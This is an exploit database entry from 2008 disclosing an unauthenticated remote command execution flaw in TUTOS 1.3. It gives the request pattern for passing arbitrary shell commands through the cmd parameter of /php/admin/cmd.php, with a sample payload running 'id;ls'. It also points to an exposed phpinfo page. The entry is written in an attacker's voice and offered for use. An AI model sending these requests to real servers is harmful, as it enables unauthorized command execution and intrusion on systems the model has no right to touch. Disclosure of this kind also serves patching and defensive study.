TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability

2008-01-07T00:00:00
ID 1337DAY-ID-2465
Type zdt
Reporter Houssamix
Modified 2008-01-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability
==========================================================




######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net           						     #
# Script :  TUTOS (Tested in version 1.3) other versions may also be affected.       #
# Download : http://www.tutos.org/homepage/index.html                                #       
# BUG :      Command Execution Vulnerability                                         #		
######################################################################################

(~)| 3xpl0it4t10n

 -1- : Command Execution

    http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]  

   >> we dont need a permission admin for access to '/php/admin/cmd.php' :d 
	
    exemple :  http://site.com/tutos/php/admin/cmd.php?cmd=id;ls
	
	or we can just  enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
	and right the command in [ CMD(*) ] and press enter :d

-2- Get phpinfo 

   http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php 

(~)| Explantion By Video :
     http://no-hack.net/video/tutos.zip
	

# greezt : CoNaN  , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers 

######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################



#  0day.today [2018-01-09]  #